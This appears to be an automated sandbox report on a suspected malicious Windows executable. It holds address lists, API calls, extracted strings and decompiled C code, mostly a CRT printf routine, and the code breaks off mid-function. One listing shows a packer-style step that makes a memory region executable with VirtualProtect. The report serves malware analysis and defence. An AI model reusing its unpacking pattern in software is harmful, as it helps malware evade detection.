    0x00b95a21
    0x00b95a36
    0x00b95a38
    0x00b95a3c
    0x00b95a3c
    0x00b95a23
    0x00b95a23
    0x00b95a27
    0x00b95a27
    0x00b95a0e
    0x00b95a0e
    0x00b95a12
    0x00b95a12
    0x00b95a0c
    0x00b95a4c
    0x00b95a58
    0x00b95a6e
    0x00b95a73
    0x00b95a73
    0x00b95a89
    0x00b95a8e
    0x00b95a97
    0x00b95ab5
    0x00b95aba
    0x00b95aba
    0x00b95ac1
    0x00b95b95
    0x00b95ba8
    0x00b95bad
    0x00000000
    0x00b95ad1
    0x00b95ad1
    0x00b95ad1
    0x00b95ade
    0x00b95ae7
    0x00b95aed
    0x00b95aed
    0x00b95afc
    0x00b95b04
    0x00000000
    0x00000000
    0x00b95b0a
    0x00b95b13
    0x00b95b32
    0x00b95b37
    0x00b95b3a
    0x00b95b49
    0x00b95b56
    0x00b95b61
    0x00b95b61
    0x00000000
    0x00b95b6d
    0x00b95b6d
    0x00b95b86
    0x00b95b8b
    0x00000000
    0x00b95b8b
    0x00b95b56
    0x00b95b93
    0x00b95bb0
    0x00b95bb7
    0x00b95bd5
    0x00b95bda
    0x00b95bda
    0x00000000
    0x00b95bb7
    0x00b951ae
    0x00b951ae
    0x00b951b5
    0x00b951bb
    0x00b951c1
    0x00b951c4
    0x00b951ca
    0x00b951dd
    0x00b951dd
    0x00b951e4
    0x00000000
    0x00b9553e
    0x00b9553e
    0x00b95545
    0x00b9554c
    0x00b9554f
    0x00000000
    0x00000000
    0x00b951eb
    0x00b951ee
    0x00b951f4
    0x00b951f9
    0x00b951fe
    0x00b951fe
    0x00000000
    0x00000000
    0x00b9532b
    0x00b9532e
    0x00b95333
    0x00b95338
    0x00b9533e
    0x00b9533e
    0x00000000
    0x00000000
    0x00b9570b
    0x00b9570b
    0x00000000
    0x00000000
    0x00b95295
    0x00b95295
    0x00b952a1
    0x00b952ae
    0x00b952bc
    0x00b952bc
    0x00b952c2
    0x00b952c5
    0x00b952d1
    0x00b95326
    0x00000000
    0x00b95326
    0x00b952b0
    0x00b952b0
    0x00b952ba
    0x00b952d6
    0x00b952d9
    0x00b952df
    0x00b95307
    0x00b9530e
    0x00b95314
    0x00b95317
    0x00b9531a
    0x00b95320
    0x00b95323
    0x00b952e1
    0x00b952e1
    0x00b952e7
    0x00b952ea
    0x00b952ed
    0x00b952f3
    0x00b952f6
    0x00b952f9
    0x00b952fb
    0x00b952fe
    0x00b952fe
    0x00000000
    0x00b952df
    0x00000000
    0x00000000
    0x00b95555
    0x00b95558
    0x00b9555b
    0x00b9555e
    0x00b95564
    0x00b95567
    0x00b95572
    0x00b9557d
    0x00b95581
    0x00b95598
    0x00b9559f
    0x00b955a1
    0x00b955a1
    0x00b955a8
    0x00b955af
    0x00b955c0
    0x00b955cf
    0x00b955d6
    0x00b955ec
    0x00b955d8
    0x00b955d8
    0x00b955db
    0x00b955e1
    0x00b955e7
    0x00b955e7
    0x00b955d6
    0x00b955f6
    0x00b955f9
    0x00b955fc
    0x00b955ff
    0x00b95602
    0x00b95605
    0x00b9560b
    0x00b95611
    0x00b95619
    0x00b9561a
    0x00b9561d
    0x00b9561e
    0x00b95621
    0x00b95622
    0x00b95629
    0x00b9562a
    0x00b9562d
    0x00b9562e
    0x00b95631
    0x00b95632
    0x00b95638
    0x00b95639
    0x00b95647
    0x00b95649
    0x00b9564f
    0x00b95655
    0x00b9565d
    0x00b95665
    0x00b95666
    0x00b95669
    0x00b9566a
    0x00b95678
    0x00b9567a
    0x00b9567a
    0x00b9567d
    0x00b95687
    0x00b9568c
    0x00b95692
    0x00b95694
    0x00b9569c
    0x00b9569d
    0x00b956a0
    0x00b956a1
    0x00b956b0
    0x00b956b2
    0x00b956b2
    0x00b95692
    0x00b956b5
    0x00b956b8
    0x00b956be
    0x00b956c3
    0x00b956c9
    0x00b956cf
    0x00b956d2
    0x00b956d2
    0x00b956d5
    0x00b956e1
    0x00000000
    0x00b956e1
    0x00b95583
    0x00b95583
    0x00b9558d
    0x00000000
    0x00000000
    0x00b9558f
    0x00b9558f
    0x00000000
    0x00b9558f
    0x00b95574
    0x00b95574
    0x00000000
    0x00000000
    0x00b95201
    0x00b95204
    0x00b9520a
    0x00b95265
    0x00b9526d
    0x00b95274
    0x00b9527a
    0x00b95280
    0x00b9520c
    0x00b9520c
    0x00b95216
    0x00b9521a
    0x00b95222
    0x00b95229
    0x00b95236
    0x00b9523d
    0x00b95249
    0x00b95256
    0x00b95258
    0x00b95258
    0x00b9525f
    0x00b95287
    0x00b9528d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b95447
    0x00b95447
    0x00b95453
    0x00b95460
    0x00b9550a
    0x00b9550d
    0x00b95510
    0x00b95524
    0x00b9552a
    0x00b95530
    0x00b95512
    0x00b95512
    0x00b9551f
    0x00b9551f
    0x00b95532
    0x00000000
    0x00b95532
    0x00b95466
    0x00b95466
    0x00b95468
    0x00b95476
    0x00b9546a
    0x00b9546a
    0x00b9546a
    0x00b95480
    0x00b95486
    0x00b95493
    0x00b95495
    0x00b9549a
    0x00b9549c
    0x00b954a1
    0x00b954a6
    0x00b954a8
    0x00b954ad
    0x00b954b3
    0x00b954b5
    0x00b954b5
    0x00b954b3
    0x00b954bd
    0x00b95505
    0x00000000
    0x00b954bf
    0x00b954bf
    0x00b954c4
    0x00b954e0
    0x00b954e8
    0x00b954f2
    0x00b954f5
    0x00b954fa
    0x00000000
    0x00b954fa
    0x00000000
    0x00b9574c
    0x00b9574c
    0x00b95756
    0x00b9575c
    0x00b95761
    0x00b95767
    0x00b95767
    0x00000000
    0x00000000
    0x00b95704
    0x00b95704
    0x00000000
    0x00000000
    0x00b95341
    0x00b95345
    0x00b95353
    0x00b95356
    0x00b95347
    0x00b95347
    0x00b95347
    0x00b9535c
    0x00b95362
    0x00b95368
    0x00b95374
    0x00b9537a
    0x00b95380
    0x00b953e7
    0x00b953eb
    0x00b953ed
    0x00b953f3
    0x00b953f3
    0x00b953f6
    0x00b953f9
    0x00b953ff
    0x00b953ff
    0x00b953ff
    0x00b9540b
    0x00b9540e
    0x00b95416
    0x00000000
    0x00000000
    0x00b95418
    0x00b95418
    0x00b9541e
    0x00b95423
    0x00000000
    0x00000000
    0x00b95425
    0x00b9542b
    0x00b9542e
    0x00b9542e
    0x00b95436
    0x00b9543c
    0x00b9543f
    0x00000000
    0x00b95382
    0x00b95382
    0x00b95386
    0x00b95388
    0x00b9538d
    0x00b9538d
    0x00b95390
    0x00b95397
    0x00b9539a
    0x00b953a0
    0x00b953a0
    0x00b953a0
    0x00b953ac
    0x00b953af
    0x00b953b7
    0x00000000
    0x00000000
    0x00b953b9
    0x00b953b9
    0x00b953bf
    0x00b953c4
    0x00000000
    0x00000000
    0x00b953c6
    0x00b953cc
    0x00b953cf
    0x00b953cf
    0x00b953d7
    0x00b953dd
    0x00b953e0
    0x00b953e2
    0x00b95442
    0x00000000
    0x00b95442
    0x00000000
    0x00b956fb
    0x00b956fb
    0x00000000
    0x00000000
    0x00b95717
    0x00b95717
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b951e4
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b9584f
    0x00b95846
    0x00b9576a
    0x00b9576a
    0x00b9576a

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
    • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
    • API String ID: 3451365851-3266125857
    • Opcode ID: fc247a1fd77c2678c38843e9aa6db35b9a3c09fca127cd1111e2ad00c929b369
    • Instruction ID: c90d1bc37d268f11656856fa94b9eb739d970db1968eecfb5819a9cc1692f5b8
    • Opcode Fuzzy Hash: fc247a1fd77c2678c38843e9aa6db35b9a3c09fca127cd1111e2ad00c929b369
    • Instruction Fuzzy Hash: D9F113B1D456298FEF25CF58CC99BAEB7F5EB44300F2481E9E419AA291D7349E80CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetThreadPriority.KERNEL32(00000000), ref: 00B78AB8
    • GetCommandLineW.KERNEL32 ref: 00B78ABE
    • SetLastError.KERNEL32(00000000), ref: 00B78AC6
    • GenerateConsoleCtrlEvent.KERNEL32(00000001,0000000E), ref: 00B78AD0
    • MoveFileWithProgressA.KERNEL32(Lama yobivok ciloh yefayox mew gepopa papojopi lice texoy nepixi,Var kaquequa bitegef pel yelareke nicisifo pijose lafac jequo quesoho,00000000,034A5040,00000001), ref: 00B78AEB
    • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 00B78CA3
    • GetLastError.KERNEL32 ref: 00B78CA9
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00B78CC0
    • GetLastError.KERNEL32 ref: 00B78CD9
    • InitializeSListHead.KERNEL32(00000000), ref: 00B78CED
    • DebugSetProcessKillOnExit.KERNEL32 ref: 00B78CF5
    • EnumSystemGeoID.KERNEL32 ref: 00B78D01
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B78D0F
    • HeapFree.KERNEL32(00000000), ref: 00B78D16
    • GetProcAddress.KERNEL32(76EB0000,VirtualProtect), ref: 00B78D3B
    • VirtualProtect.KERNELBASE(02EB4040,005DB76C,00000040,?), ref: 00B78D73
    • LoadResource.KERNEL32(00000000,00000000), ref: 00B78D93
    • GetACP.KERNEL32 ref: 00B78DBA
    • FreeResource.KERNEL32(00000000), ref: 00B78DC7
    • __atodbl_l.LIBCMTD ref: 00B78E5F
    Strings
    • PRK1, xrefs: 00B78BBC
    • Var kaquequa bitegef pel yelareke nicisifo pijose lafac jequo quesoho, xrefs: 00B78AE1
    • O, xrefs: 00B78CAF
    • `, xrefs: 00B78BB5
    • KERNEL32.DLL, xrefs: 00B78CBB
    • Lama yobivok ciloh yefayox mew gepopa papojopi lice texoy nepixi, xrefs: 00B78AE6
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: ErrorLastProcess$FreeHeapResource$AddressCommandConsoleCtrlDebugEnumEventExitFileGenerateHandleHeadHeapsInitializeKillLineListLoadModuleMovePriorityProcProgressProtectSystemThreadVirtualWith__atodbl_l
    • String ID: KERNEL32.DLL$Lama yobivok ciloh yefayox mew gepopa papojopi lice texoy nepixi$PRK1$Var kaquequa bitegef pel yelareke nicisifo pijose lafac jequo quesoho$`$O
    • API String ID: 457987920-2244880419
    • Opcode ID: 4aba8da7cbaa11908c8b4d0734e1f6017edbb341f96f8d8ddbbc5b363c9b462a
    • Instruction ID: ad68675df9d87ad8b77fa4d09dc3475b4e13df728deeec17f183b4d515df109d
    • Opcode Fuzzy Hash: 4aba8da7cbaa11908c8b4d0734e1f6017edbb341f96f8d8ddbbc5b363c9b462a
    • Instruction Fuzzy Hash: 9A5120B4D45358DFEB208F99ED4AB9CBB71FB00701F608589E2597B291CBB00A81CF65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E00B96A5B(signed int __edx) {
    				signed int _t485;
    				signed int _t504;
    				void* _t509;
    				signed int _t511;
    				void* _t519;
    				void* _t537;
    				intOrPtr _t541;
    				signed int _t558;
    				signed short _t559;
    				signed int _t562;
    				signed int _t565;
    				signed int _t566;
    				void* _t567;
    				signed int _t621;
    				signed int _t623;
    				signed int _t625;
    				signed int _t632;
    				signed int _t644;
    				signed int _t671;
    				void* _t672;
    				void* _t673;
    				signed int _t674;
    				void* _t676;
    				void* _t677;
    				signed int _t683;
    
    				L0:
    				while(1) {
    					L0:
    					_t621 = __edx;
    					 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000040;
    					 *(_t674 - 8) = 0xa;
    					L150:
    					while(1) {
    						L150:
    						while(1) {
    							L150:
    							while(1) {
    								L150:
    								if(( *(_t674 - 0x10) & 0x00008000) == 0) {
    									_t623 =  *(_t674 - 0x10) & 0x00001000;
    									if(_t623 == 0) {
    										if(( *(_t674 - 0x10) & 0x00000020) == 0) {
    											_t625 =  *(_t674 - 0x10) & 0x00000040;
    											if(_t625 == 0) {
    												_t485 = E00B93D50(_t674 + 0x14);
    												_t677 = _t676 + 4;
    												 *(_t674 - 0x4a0) = _t485;
    												 *(_t674 - 0x49c) = 0;
    											} else {
    												_t558 = E00B93D50(_t674 + 0x14);
    												_t677 = _t676 + 4;
    												asm("cdq");
    												 *(_t674 - 0x4a0) = _t558;
    												 *(_t674 - 0x49c) = _t625;
    											}
    										} else {
    											_t671 =  *(_t674 - 0x10) & 0x00000040;
    											if(_t671 == 0) {
    												_t559 = E00B93D50(_t674 + 0x14);
    												_t677 = _t676 + 4;
    												asm("cdq");
    												 *(_t674 - 0x4a0) = _t559 & 0x0000ffff;
    												 *(_t674 - 0x49c) = _t671;
    											} else {
    												_t562 = E00B93D50(_t674 + 0x14);
    												_t677 = _t676 + 4;
    												asm("cdq");
    												 *(_t674 - 0x4a0) = _t562;
    												 *(_t674 - 0x49c) = _t671;
    											}
    										}
    									} else {
    										_t565 = E00B93D70(_t674 + 0x14);
    										_t677 = _t676 + 4;
    										 *(_t674 - 0x4a0) = _t565;
    										 *(_t674 - 0x49c) = _t623;
    									}
    								} else {
    									_t566 = E00B93D70(_t674 + 0x14);
    									_t677 = _t676 + 4;
    									 *(_t674 - 0x4a0) = _t566;
    									 *(_t674 - 0x49c) = _t621;
    								}
    								if(( *(_t674 - 0x10) & 0x00000040) == 0) {
    									L167:
    									 *(_t674 - 0x4a8) =  *(_t674 - 0x4a0);
    									 *(_t674 - 0x4a4) =  *(_t674 - 0x49c);
    									goto L168;
    								} else {
    									L163:
    									_t683 =  *(_t674 - 0x49c);
    									if(_t683 > 0 || _t683 >= 0 &&  *(_t674 - 0x4a0) >= 0) {
    										goto L167;
    									} else {
    										L166:
    										asm("adc edx, 0x0");
    										 *(_t674 - 0x4a8) =  ~( *(_t674 - 0x4a0));
    										 *(_t674 - 0x4a4) =  ~( *(_t674 - 0x49c));
    										 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000100;
    										L168:
    										if(( *(_t674 - 0x10) & 0x00008000) == 0 && ( *(_t674 - 0x10) & 0x00001000) == 0) {
    											 *(_t674 - 0x4a4) =  *(_t674 - 0x4a4) & 0x00000000;
    										}
    										if( *(_t674 - 0x30) >= 0) {
    											 *(_t674 - 0x10) =  *(_t674 - 0x10) & 0xfffffff7;
    											if( *(_t674 - 0x30) > 0x200) {
    												 *(_t674 - 0x30) = 0x200;
    											}
    										} else {
    											 *(_t674 - 0x30) = 1;
    										}
    										if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
    											 *(_t674 - 0x1c) = 0;
    										}
    										 *((intOrPtr*)(_t674 - 4)) = _t674 - 0x249;
    										while(1) {
    											L178:
    											_t631 =  *(_t674 - 0x30) - 1;
    											 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
    											if( *(_t674 - 0x30) <= 0 && ( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
    												break;
    											}
    											L180:
    											asm("cdq");
    											_t632 =  *(_t674 - 0x4a8);
    											 *((intOrPtr*)(_t674 - 0x494)) = E00B855B0(_t632,  *(_t674 - 0x4a4),  *(_t674 - 8), _t631) + 0x30;
    											asm("cdq");
    											 *(_t674 - 0x4a8) = E00B85630( *(_t674 - 0x4a8),  *(_t674 - 0x4a4),  *(_t674 - 8), _t632);
    											 *(_t674 - 0x4a4) = _t632;
    											if( *((intOrPtr*)(_t674 - 0x494)) > 0x39) {
    												 *((intOrPtr*)(_t674 - 0x494)) =  *((intOrPtr*)(_t674 - 0x494)) +  *((intOrPtr*)(_t674 - 0x460));
    											}
    											 *((char*)( *((intOrPtr*)(_t674 - 4)))) =  *((intOrPtr*)(_t674 - 0x494));
    											 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
    										}
    										L183:
    										 *((intOrPtr*)(_t674 - 0x24)) = _t674 - 0x249 -  *((intOrPtr*)(_t674 - 4));
    										 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) + 1;
    										if(( *(_t674 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t674 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t674 - 4)))) != 0x30)) {
    											 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
    											 *((char*)( *((intOrPtr*)(_t674 - 4)))) = 0x30;
    											 *((intOrPtr*)(_t674 - 0x24)) =  *((intOrPtr*)(_t674 - 0x24)) + 1;
    										}
    										L187:
    										while(1) {
    											L187:
    											while(1) {
    												L187:
    												while(1) {
    													L187:
    													while(1) {
    														L187:
    														while(1) {
    															L187:
    															while(1) {
    																L187:
    																while(1) {
    																	do {
    																		L187:
    																		if( *((intOrPtr*)(_t674 - 0x28)) != 0) {
    																			L212:
    																			if( *(_t674 - 0x20) != 0) {
    																				L00B7EB20( *(_t674 - 0x20), 2);
    																				_t677 = _t677 + 8;
    																				 *(_t674 - 0x20) = 0;
    																			}
    																			while(1) {
    																				L214:
    																				 *(_t674 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t674 + 0xc))));
    																				_t580 =  *(_t674 - 0x454) & 0x0000ffff;
    																				 *((intOrPtr*)(_t674 + 0xc)) =  *((intOrPtr*)(_t674 + 0xc)) + 2;
    																				if(( *(_t674 - 0x454) & 0x0000ffff) == 0 ||  *(_t674 - 0x44c) < 0) {
    																					break;
    																				} else {
    																					if(( *(_t674 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t674 - 0x454) & 0x0000ffff) > 0x78) {
    																						 *(_t674 - 0x4d8) = 0;
    																					} else {
    																						 *(_t674 - 0x4d8) =  *(( *(_t674 - 0x454) & 0x0000ffff) +  &M00B77B58) & 0xf;
    																					}
    																				}
    																				L7:
    																				 *(_t674 - 0x450) =  *(_t674 - 0x4d8);
    																				_t644 =  *(_t674 - 0x450) * 9;
    																				_t511 =  *(_t674 - 0x45c);
    																				_t588 = ( *(_t644 + _t511 + 0xb77b78) & 0x000000ff) >> 4;
    																				 *(_t674 - 0x45c) = ( *(_t644 + _t511 + 0xb77b78) & 0x000000ff) >> 4;
    																				if( *(_t674 - 0x45c) != 8) {
    																					L16:
    																					 *(_t674 - 0x4e0) =  *(_t674 - 0x45c);
    																					if( *(_t674 - 0x4e0) > 7) {
    																						continue;
    																					}
    																					L17:
    																					switch( *((intOrPtr*)( *(_t674 - 0x4e0) * 4 +  &M00B97044))) {
    																						case 0:
    																							L18:
    																							 *(_t674 - 0xc) = 1;
    																							E00B97150( *(_t674 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																							_t677 = _t677 + 0xc;
    																							goto L214;
    																						case 1:
    																							L19:
    																							 *(__ebp - 0x2c) = 0;
    																							__ecx =  *(__ebp - 0x2c);
    																							 *(__ebp - 0x28) = __ecx;
    																							__edx =  *(__ebp - 0x28);
    																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																							__eax =  *(__ebp - 0x18);
    																							 *(__ebp - 0x1c) =  *(__ebp - 0x18);
    																							 *(__ebp - 0x10) = 0;
    																							 *(__ebp - 0x30) = 0xffffffff;
    																							 *(__ebp - 0xc) = 0;
    																							goto L214;
    																						case 2:
    																							L20:
    																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																							 *(__ebp - 0x4e4) = __ecx;
    																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																							if( *(__ebp - 0x4e4) > 0x10) {
    																								goto L27;
    																							}
    																							L21:
    																							_t59 =  *(__ebp - 0x4e4) + 0xb9707c; // 0x498d04
    																							__ecx =  *_t59 & 0x000000ff;
    																							switch( *((intOrPtr*)(__ecx * 4 +  &M00B97064))) {
    																								case 0:
    																									goto L24;
    																								case 1:
    																									goto L25;
    																								case 2:
    																									goto L23;
    																								case 3:
    																									goto L22;
    																								case 4:
    																									goto L26;
    																								case 5:
    																									goto L27;
    																							}
    																						case 3:
    																							L28:
    																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																								 *(__ebp - 0x18) =  *(__ebp - 0x18) * 0xa;
    																								_t83 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																								__ecx =  *(__ebp - 0x18) * 0xa + _t83;
    																								 *(__ebp - 0x18) = __ecx;
    																							} else {
    																								__edx = __ebp + 0x14;
    																								 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																								if( *(__ebp - 0x18) < 0) {
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																									__ecx =  *(__ebp - 0x18);
    																									__ecx =  ~( *(__ebp - 0x18));
    																									 *(__ebp - 0x18) = __ecx;
    																								}
    																							}
    																							goto L214;
    																						case 4:
    																							L34:
    																							 *(__ebp - 0x30) = 0;
    																							goto L214;
    																						case 5:
    																							L35:
    																							__edx =  *(__ebp - 0x454) & 0x0000ffff;
    																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																								__ecx =  *(__ebp - 0x30);
    																								__ecx =  *(__ebp - 0x30) * 0xa;
    																								_t94 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																								__eax = __ecx + _t94;
    																								 *(__ebp - 0x30) = __ecx + _t94;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																								if( *(__ebp - 0x30) < 0) {
    																									 *(__ebp - 0x30) = 0xffffffff;
    																								}
    																							}
    																							goto L214;
    																						case 6:
    																							L41:
    																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																							 *(__ebp - 0x4e8) = __ecx;
    																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																							if( *(__ebp - 0x4e8) > 0x2e) {
    																								L64:
    																								goto L214;
    																							}
    																							L42:
    																							_t102 =  *(__ebp - 0x4e8) + 0xb970a4; // 0x68b19003
    																							__ecx =  *_t102 & 0x000000ff;
    																							switch( *((intOrPtr*)(__ecx * 4 +  &M00B97090))) {
    																								case 0:
    																									L47:
    																									__ecx =  *(__ebp + 0xc);
    																									__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
    																										L50:
    																										__ecx =  *(__ebp + 0xc);
    																										__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																										if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
    																											L53:
    																											__ecx =  *(__ebp + 0xc);
    																											__edx =  *__ecx & 0x0000ffff;
    																											if(( *__ecx & 0x0000ffff) == 0x64) {
    																												L59:
    																												L61:
    																												goto L64;
    																											}
    																											L54:
    																											__eax =  *(__ebp + 0xc);
    																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(__ecx == 0x69) {
    																												goto L59;
    																											}
    																											L55:
    																											__edx =  *(__ebp + 0xc);
    																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
    																												goto L59;
    																											}
    																											L56:
    																											__ecx =  *(__ebp + 0xc);
    																											__edx =  *__ecx & 0x0000ffff;
    																											if(( *__ecx & 0x0000ffff) == 0x75) {
    																												goto L59;
    																											}
    																											L57:
    																											__eax =  *(__ebp + 0xc);
    																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(__ecx == 0x78) {
    																												goto L59;
    																											}
    																											L58:
    																											__edx =  *(__ebp + 0xc);
    																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
    																												 *(__ebp - 0x45c) = 0;
    																												goto L18;
    																											}
    																											goto L59;
    																										}
    																										L51:
    																										__eax =  *(__ebp + 0xc);
    																										__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																										if(__ecx != 0x32) {
    																											goto L53;
    																										} else {
    																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																											goto L61;
    																										}
    																									}
    																									L48:
    																									__eax =  *(__ebp + 0xc);
    																									__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																									if(__ecx != 0x34) {
    																										goto L50;
    																									} else {
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																										goto L61;
    																									}
    																								case 1:
    																									L62:
    																									__ecx =  *(__ebp - 0x10);
    																									__ecx =  *(__ebp - 0x10) | 0x00000020;
    																									 *(__ebp - 0x10) = __ecx;
    																									goto L64;
    																								case 2:
    																									L43:
    																									__edx =  *(__ebp + 0xc);
    																									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
    																									} else {
    																										__ecx =  *(__ebp + 0xc);
    																										__ecx =  *(__ebp + 0xc) + 2;
    																										 *(__ebp + 0xc) = __ecx;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																									}
    																									goto L64;
    																								case 3:
    																									L63:
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																									goto L64;
    																								case 4:
    																									goto L64;
    																							}
    																						case 7:
    																							goto L65;
    																						case 8:
    																							L24:
    																							__ecx =  *(__ebp - 0x10);
    																							__ecx =  *(__ebp - 0x10) | 0x00000002;
    																							 *(__ebp - 0x10) = __ecx;
    																							goto L27;
    																						case 9:
    																							L25:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																							goto L27;
    																						case 0xa:
    																							L23:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																							goto L27;
    																						case 0xb:
    																							L22:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																							goto L27;
    																						case 0xc:
    																							L26:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
    																							goto L27;
    																						case 0xd:
    																							L27:
    																							goto L214;
    																					}
    																				} else {
    																					_t642 = 0;
    																					if(0 == 0) {
    																						 *(_t674 - 0x4dc) = 0;
    																					} else {
    																						 *(_t674 - 0x4dc) = 1;
    																					}
    																					 *(_t674 - 0x46c) =  *(_t674 - 0x4dc);
    																					if( *(_t674 - 0x46c) == 0) {
    																						_push( &M00B77C38);
    																						_push(0);
    																						_push(0x460);
    																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																						_push(2);
    																						_t519 = L00B7D760();
    																						_t677 = _t677 + 0x14;
    																						if(_t519 == 1) {
    																							asm("int3");
    																						}
    																					}
    																					L14:
    																					if( *(_t674 - 0x46c) != 0) {
    																						goto L16;
    																					} else {
    																						 *((intOrPtr*)(L00B80C60(_t588))) = 0x16;
